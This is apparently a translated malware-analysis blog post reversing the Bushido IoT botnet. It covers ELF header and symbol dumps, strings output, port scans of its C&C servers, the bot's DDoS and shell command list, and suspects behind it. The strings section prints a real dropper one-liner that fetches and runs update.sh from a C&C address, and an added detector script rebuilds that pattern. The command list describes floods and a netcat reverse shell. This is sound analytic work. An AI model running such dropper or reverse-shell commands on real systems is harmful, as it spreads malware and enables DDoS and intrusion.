
Reversing the Bushido IoT Botnet

This article describes a botnet codenamed Bushido. It can launch DDoS attacks both from compromised IoT devices and from compromised web servers. The article covers the malware's infection behaviour and also tries to identify the author behind it.

Thanks to MalwareMustDie for providing the initial scripts for this analysis. In short, these scripts download a number of executables from a server and run them, fetching a different executable for each target platform, as follows:

For this article we chose the 64-bit ELF sample for reverse engineering; the samples for the other platforms implement the same logic.

Malicious samples

First, here is the complete list of files belonging to this botnet, as identified at the end of the analysis:

| File hash (SHA-256) | File name | Function |
|---|---|---|
| 4c1ff6424e1d47921a9c3822c67b6d288e67781d22ee1bc4f82fc11509bfb479 | a09rndgxtx | botnet binary |
| 40a9be5a72284a14939271e244a9904142c7e87e64d2b1a476b51d36c5f2de26 | a88hfdje8 | botnet binary |
| f4bed53e2a0d273f00e82825607164ad20caa5f1a02e48e4b5627a819f49df8b | ab89484bdhd | botnet binary |
| d12ffbef4d85806d77294377956c4ecc48ac9b8c3bddbf26a917723f80c719fb | adjde99vhc | botnet binary |
| c1b12ad1eb4e64896a66dc9b4e83f0e3a7d2d4c79819b68853f0f64fd329ac83 | adjs8993bd | botnet binary |
| 37ac5b9aef6955a7a393d87ee656656851c313896fdeaff3b591e68ebda7a21d | agf63683gd | botnet binary |
| 5a8a8ea38ac8202373474e5ce535efd2302543a5aa595aa00bd3b553467ffd34 | alfkdcj9e8 | botnet binary |
| fd171c6b8f870bf64885cb05a5f1da3581537810652a9714a592c21889722198 | alo99edgwu | botnet binary |
| 9bad4e105c1701c965fd65118a14e06d222ca13eb9adb3c9e1e4fd7a80374087 | apr98dgs5c | botnet binary |
| ca5bb4a794663f35c1ded854e5157e8d077624501514ecac329be7ada8e0248c | aqerd783nd | botnet binary |
| 7c492dde22c828fffc3067ef6aaa5d466cab76858079ce57492ce9bbfd7e449a | atyur7837s | botnet binary |
| 5fb8b5590b4845b31988f636a5a09b02bdbb3e730dd1f78d8f04a02013cb760d | ambvjcv9e0 | botnet binary |
| 70d7adcd931eb49ede937b64f1653a6710fbcea891e2ab186165cff1d3429945 | 8UsA1.sh | infection script |
| 36f38298c5345abf9f0036890b357610078327a4a0a0e61db79fe7afb591830d | update.sh | infection script |
| eabee288c9605b29f75cd23204b643cfe4d175851b7d57c3d3d73703bd0f8ec8 | ftp1.sh | downloads the malware samples via FTP and installs them |
| 2544f0299a5795bf12494e2cbe09701cb024b06a0b924c91de0d35efb955a5fe | pma.php | PHP botnet, more on it in a later section |
| 18d6a4280adf67e2adf7a89aa11faa93a5ed6fc9d64b31063386d762b92b45d3 | pma.pl | Perl botnet, more on it in a later section |

Static analysis

The 64-bit binary is the file ambvjcv9e0. First, look at its file type:

$ file ambvjcv9e0
ambvjcv9e0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped

As shown above, this is a 64-bit ELF file. Next we look at the ELF header:

$ readelf -h x64_ambvjcv9e0
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400194
  Start of program headers:          64 (bytes into file)
  Start of section headers:          120288 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         3
  Size of section headers:           64 (bytes)
  Number of section headers:         15
  Section header string table index: 12

Then, the program headers of the ELF file:

$ readelf -l ambvjcv9e0
Elf file type is EXEC (Executable file)
Entry point 0x400194
There are 3 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x000000000001b50c 0x000000000001b50c  R E    0x100000
  LOAD           0x000000000001b510 0x000000000051b510 0x000000000051b510
                 0x0000000000001418 0x00000000000094a0  RW     0x100000
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x8

 Section to Segment mapping:
  Segment Sections...
   00     .init .text .fini .rodata .eh_frame
   01     .ctors .dtors .jcr .data .bss
   02

As shown above, there is neither a DYNAMIC nor an INTERP entry, so the binary needs no dynamic loader. Next we look at the full section header table:

$ readelf -S ambvjcv9e0
There are 15 section headers, starting at offset 0x1d5e0:

Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
  [ 0]                   NULL             0000000000000000  00000000
       0000000000000000  0000000000000000           0     0     0
  [ 1] .init             PROGBITS         00000000004000e8  000000e8
       0000000000000013  0000000000000000  AX       0     0     1
  [ 2] .text             PROGBITS         0000000000400100  00000100
       0000000000015138  0000000000000000  AX       0     0     16
  [ 3] .fini             PROGBITS         0000000000415238  00015238
       000000000000000e  0000000000000000  AX       0     0     1
  [ 4] .rodata           PROGBITS         0000000000415260  00015260
       00000000000062a6  0000000000000000   A       0     0     32
  [ 5] .eh_frame         PROGBITS         000000000041b508  0001b508
       0000000000000004  0000000000000000   A       0     0     4
  [ 6] .ctors            PROGBITS         000000000051b510  0001b510
       0000000000000010  0000000000000000  WA       0     0     8
  [ 7] .dtors            PROGBITS         000000000051b520  0001b520
       0000000000000010  0000000000000000  WA       0     0     8
  [ 8] .jcr              PROGBITS         000000000051b530  0001b530
       0000000000000008  0000000000000000  WA       0     0     8
  [ 9] .data             PROGBITS         000000000051b540  0001b540
       00000000000013e8  0000000000000000  WA       0     0     32
  [10] .bss              NOBITS           000000000051c940  0001c928
       0000000000008070  0000000000000000  WA       0     0     32
  [11] .comment          PROGBITS         0000000000000000  0001c928
       0000000000000c4e  0000000000000000           0     0     1
  [12] .shstrtab         STRTAB           0000000000000000  0001d576
       0000000000000066  0000000000000000           0     0     1
  [13] .symtab           SYMTAB           0000000000000000  0001d9a0
       0000000000005418  0000000000000018          14   290     8
  [14] .strtab           STRTAB           0000000000000000  00022db8
       00000000000029a2  0000000000000000           0     0     1

As shown above, this ELF file is statically linked and has not been stripped, so we can read its symbol table with readelf:

$ readelf -s ambvjcv9e0
318: 000000000040bc46   485 FUNC    GLOBAL DEFAULT    2 popen
319: 0000000000407ca5   177 FUNC    GLOBAL DEFAULT    2 botkill
320: 0000000000411484   351 FUNC    GLOBAL DEFAULT    2 sysconf
322: 000000000040b7d8    15 FUNC    GLOBAL DEFAULT    2 vsprintf
323: 0000000000410ab4    72 FUNC    GLOBAL DEFAULT    2 random
324: 0000000000411ad0    19 FUNC    GLOBAL HIDDEN     2 __GI_getpagesize
325: 000000000040dd60    54 FUNC    GLOBAL HIDDEN     2 __GI_strdup
326: 000000000040b43c    35 FUNC    GLOBAL DEFAULT    2 getdtablesize
328: 0000000000405c17    33 FUNC    GLOBAL DEFAULT    2 contains_fail
329: 000000000040037f   286 FUNC    GLOBAL DEFAULT    2 Send
330: 0000000000414c50    19 FUNC    GLOBAL HIDDEN     2 __length_question
332: 000000000040877a  1608 FUNC    GLOBAL DEFAULT    2 hackpkg
333: 00000000004130c4   115 FUNC    GLOBAL DEFAULT    2 setservent
334: 000000000040dce8    48 FUNC    GLOBAL HIDDEN     2 __GI_strcasecmp
335: 0000000000411cd0    30 FUNC    GLOBAL HIDDEN     2 __GI_tolower
336: 000000000040d3a8   192 FUNC    GLOBAL DEFAULT    2 putc_unlocked
337: 000000000040fad4    11 FUNC    WEAK   DEFAULT    2 recv
338: 000000000040fa48    43 FUNC    WEAK   DEFAULT    2 connect
339: 0000000000414c00    80 FUNC    GLOBAL HIDDEN     2 __encode_question
340: 00000000004115e4    70 FUNC    GLOBAL HIDDEN     2 __GI___uClibc_fini
342: 0000000000414ab8   163 FUNC    GLOBAL HIDDEN     2 __encode_header
343: 0000000000413234   233 FUNC    GLOBAL DEFAULT    2 getservbyname_r
344: 0000000000414a40   119 FUNC    GLOBAL HIDDEN     2 __GI_strncat
345: 000000000041162a     3 FUNC    WEAK   DEFAULT    2 __pthread_mutex_lock
346: 000000000040fc98    30 FUNC    GLOBAL DEFAULT    2 __sigdelset

Next we list the symbols whose names end in '.c' (the FILE symbols, which name the compilation units the binary was built from):

$ readelf -s x64_ambvjcv9e0 | grep -F .c
16: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
26: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
32: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS initfini.c
35: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS Bushido-IRC.c
50: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS __syscall_fcntl.c
51: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS _exit.c
52: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS close.c
53: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS fork.c
54: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS getdtablesize.c
55: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS getpid.c
56: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS getppid.c
57: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS getrlimit.c
58: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS ioctl.c
59: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS kill.c

An interesting file turns up: Bushido-IRC.c, which is where the botnet's name comes from. Even more interesting, I then found that no decompilation was needed at all: the strings tool alone reveals a great deal of useful information about this sample.

$ strings ambvjcv9e0
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://80.93.187.211/update.sh -O update.sh; busybox wget http://80.93.187.211/update.sh -O update.sh; ftpget
 -v -u anonymous -p anonymous -P 21 80.93.187.211 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 80.93.187.211 update.sh update.sh; chmod 777 upd
ate.sh; ./update.sh; rm -rf update.sh
mirai.*
dlr.*mips
mips64
mipsel
sh2eb
sh2elf
armv5
armv4tl
armv4
armv6
i686
powerpc

Browsing through the strings output I found the following interesting information about the sample:

  1. The IP address of the C&C server
  2. The username and password for the telnet service
  3. A number of HTTP header strings
  4. A number of user-agent strings
  5. A large amount of racist text
  6. Many IRC commands and related strings
  7. Usage instructions for the malware
  8. The malware update command and many other commands
  9. Error-handling strings
  10. libc function names
  11. nmap scan commands
  12. The name of the build script
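As an added example (not from the original post), the following detector breaks a shell one-liner down into the stages that the dropper string recovered above exhibits (directory fallback chain, fetch, chmod, local execute, cleanup) and extracts the hosts it fetches from; the sample command lines are constructed with documentation addresses, not copied from the real string.

```python
import re

# Constructed samples (203.0.113.0/24 is a documentation range): the first mirrors the
# structure of the dropper string recovered from the binary, the second is a benign install.
SAMPLES = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "wget http://203.0.113.10/update.sh -O update.sh; "
    "busybox wget http://203.0.113.10/update.sh -O update.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 203.0.113.10 update.sh update.sh; "
    "chmod 777 update.sh; ./update.sh; rm -rf update.sh",
    "cd /opt/app && wget https://example.org/release.tar.gz -O release.tar.gz && tar xzf release.tar.gz",
]

# One regex per dropper stage; the order here is also the order reported back.
STAGES = {
    "dir_fallback": re.compile(r"\bcd\s+\S+\s*\|\|\s*cd\s+\S+"),       # cd a || cd b || ...
    "fetch": re.compile(r"\b(?:busybox\s+)?(?:wget|ftpget|curl|tftp)\b"),
    "chmod": re.compile(r"\bchmod\s+\S+\s+\S+"),
    "exec_local": re.compile(r"(?:^|[;&|]\s*)\./\S+"),                  # ; ./update.sh
    "cleanup": re.compile(r"\brm\s+-rf?\s+\S+"),                         # rm -rf update.sh
}
URL_RE = re.compile(r"\b(?:https?|ftp)://([^/\s;]+)")
FTPGET_RE = re.compile(r"\bftpget\b.*?-P\s+\d+\s+(\S+)")                # host is positional

def analyse_dropper(cmdline):
    """Report which dropper stages a command line contains and the hosts it fetches from."""
    stages = [name for name, rx in STAGES.items() if rx.search(cmdline)]
    hosts = sorted({m.group(1) for m in URL_RE.finditer(cmdline)})
    for h in FTPGET_RE.findall(cmdline):      # ftpget has no URL, so pick up its host too
        if h not in hosts:
            hosts.append(h)
    return {"stages": stages, "hosts": hosts, "score": len(stages)}

def is_dropper(cmdline, threshold=4):
    """Flag a command line when it shows most of the fetch-chmod-run-delete pattern."""
    return analyse_dropper(cmdline)["score"] >= threshold

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_dropper(line), analyse_dropper(line))
```

The threshold keeps a plain `wget` or a single `chmod` from firing; it is the co-occurrence of the stages in one command line that characterises this family's dropper.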

From these strings we can roughly judge what the malware does, but to understand its workflow and how it connects to the C&C server we need deeper analysis. Since we already know the IP address, we can port-scan the C&C server directly.

Scanning the server

Once the C&C server's IP address had been obtained from the executable, the natural next step was a port scan, which produced the following results:

1. Server A (IP 80.93.187.211)

21/tcp   open     ftp        
22/tcp   open     ssh          OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
|   1024 b3:ae:e9:79:22:65:37:15:13:66:c8:8f:0a:81:13:ec (DSA)
|_  2048 32:e9:e2:9f:9b:ae:13:e6:99:7a:60:91:9c:38:30:8d (RSA)
80/tcp   open     http         Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
443/tcp  open     https?
445/tcp  filtered microsoft-ds
3306/tcp open     mysql        MySQL (unauthorized)
6667/tcp open     irc          UnrealIRCd
| irc-info:
|   users: 57
|   servers: 1
|   chans: 3
|   lusers: 57
|   lservers: 0
|   server: irc.NulL
|   version: Unreal3.2.10.6. irc.NulL
|   source ident: nmap
|   source host: 19A967F7.1F3B5440.6D396E3B.IP
|_  error: Closing Link: kksqfgqca[114.143.107.254] (Client has disconnected from ZullSec)

From the scan results we can conclude:

  1. This is an IRC-based C&C server.
  2. The FTP service might be usable: indeed, I logged in successfully with the default anonymous username and password. Once logged in, all of the files listed earlier could be retrieved. In one of the scripts, 8UsA1.sh, we found that it also connects to another IP address: 185.244.25.217.

2. Server B (IP 185.244.25.217)

This IP was found in the file 8UsA1.sh. An nmap port scan of it unfortunately turned up nothing interesting; it only exposes an HTTP service:

80/tcp  open  http
443/tcp open  https
Running: Linux 2.6.X
OS details: Linux 2.6.18 - 2.6.22

C&C server

From the analysis above I conclude that this sample belongs to an IRC-based botnet controlled through server A. Connecting to the C&C server with an IRC client reveals two channels:

  1. pma – web servers infected by the malicious scripts join this channel on the C&C server via IRC
  2. zull – IoT devices infected by the malicious binary join this channel on the C&C server via IRC

IRC server

Analysis shows that the bot connects to the IRC service with a command of the form “NICK[ZULL|x86_64]ZM5z”. This command registers the bot under the nick NICK[...] and joins the IRC channel #zull; the password it uses is hard-coded in the executable, as follows:

Bot capabilities

The analysis shows that the bot has the following capabilities:

  1. DDoS attacks, the main function; several DDoS attack types are built in, such as ICMP flood and TCP/UDP flood
  2. The bot can be shut down remotely by the C&C; the password for this shutdown command is “FreakIsYourGod!!!”, also hard-coded in the binary, as follows:

  3. The bot can download a new executable from the server, or download the source code and compile the executable itself
  4. The bot can move to a new server if the current server goes down

Reverse engineering the bot binary reveals an array of structures whose first member is a string (the command name) and whose second member is a function pointer (the function implementing that command). This array is the command table, as follows:

To summarise, the bots consist of executables running on IoT devices and scripts running on web servers. Each bot connects to its channel on the IRC server, IoT bots to #zull and web-server bots to #pma, and then waits for commands from the IRC server. The commands are listed below.

Commands supported by the malicious executable

Non-root/non-spoof DDoS commands:
  • STD: A non spoof HIV STD flooder
  • HOLD: A vanilla TCP connect flooder
  • JUNK: A vanilla TCP flooder (modded)
  • UNKNOWN <port, 0 for random> <packet size, 0 for random>: An advanced non spoof UDP flooder modified by Freak
  • HTTP: An extremely powerful HTTP flooder

Spoof/root commands:
  • UDP: A UDP flooder
  • PAN: An advanced syn flooder that will kill most network drivers
  • TCP: An advanced TCP flooder with multithreading. Will kill almost any service.
  • PHATWONK <flags/method>: A leet flooder coded by Freak, attacks 31 ports. Can set flags or attack method.
  • BLACKNURSE: An ICMP packet flooder that will crash most firewalls and use loads of CPU.

Other commands:
  • RNDNICK: Randomizes the knights nick
  • NICK: Changes the nick of the client
  • SERVER: Changes servers
  • GETSPOOFS: Gets the current spoofing
  • SPOOFS: Changes spoofing to a subnet
  • DISABLE: Disables all packeting from this client
  • ENABLE: Enables all packeting from this client
  • KILL: Kills the knight
  • DNS2IP
  • GET: Downloads a file off the web and saves it onto the hd
  • UPDATE <src:bin>: Update this bot
  • HACKPKG: HackPkg is here! Install a bin, using http, no depends!
  • VERSION: Requests version of client
  • KILLALL: Kills all current packeting
  • HELP: Displays this
  • IRC: Sends this command to the server
  • SH: Executes a command
  • ISH: SH, interactive, sends to channel
  • SHD: Executes a psuedo-daemonized command
  • GETBB: Get a proper busybox
  • INSTALL <http server/file_name>: Download & install a binary to /var/bin
  • BASH: Execute commands using bash.
  • BINUPDATE http:server/package: Update a binary in /var/bin via wget
  • SCAN: Call the nmap wrapper script and scan with your opts.
  • RSHELL: Equates to nohup nc ip port -e /bin/sh
  • LOCKUP http:server: Kill telnet, d/l aes backdoor from, run that instead.
  • GETSSH http:server/dropbearmulti: D/l, install, configure and start dropbear on port 30022.

Commands supported by the malicious scripts

  • mail [to] [from] [subject] [message]
  • dns [host]
  • rndnick
  • raw [irc] [data]
  • uname
  • eval [php] [code]
  • exec [command] [args]
  • cmd [command] [args]
  • udpflood [ip] [port] [time] [packet] [size]
  • tcpconn [host] [port] [time]
  • slowread [host] [port] [page] [sockets] [time]
  • slowloris [host] [time]
  • l7 method [host] [time]
  • post [host] time
  • head [host] [time]
  • tcpflood [host] [port] [time]
  • httpflood [host] [port] [time] [method] [url]
  • proxyhttpflood [targetUrl(with http://)] [proxyListUrl] [time] [method]
  • cloudflareflood [host] [port] [time] [method] [url] [postFields]
  • ud.server [host] [port] [pass] [chan]

The people behind the malware

When connecting to the IRC server, the following message is displayed:

Searching Twitter for the keywords above turned up two accounts:

  1. m4licious
  2. M1rOx

These accounts belong to a group calling itself Offsecurity; I suspect they are trying to sell this botnet. A little googling turned up more information:

  1. Twitter
  2. Facebook
  3. YouTube

Conclusion

This malware does nothing novel; I suspect it was adapted from the open-source Mirai code. The operators launch DDoS attacks from compromised web servers and IoT devices, and control all of the bots through an IRC server.

Original article: http://www.mien.in/2018/09/02/reversing-bushido-iot-botnet-by-zullsec/
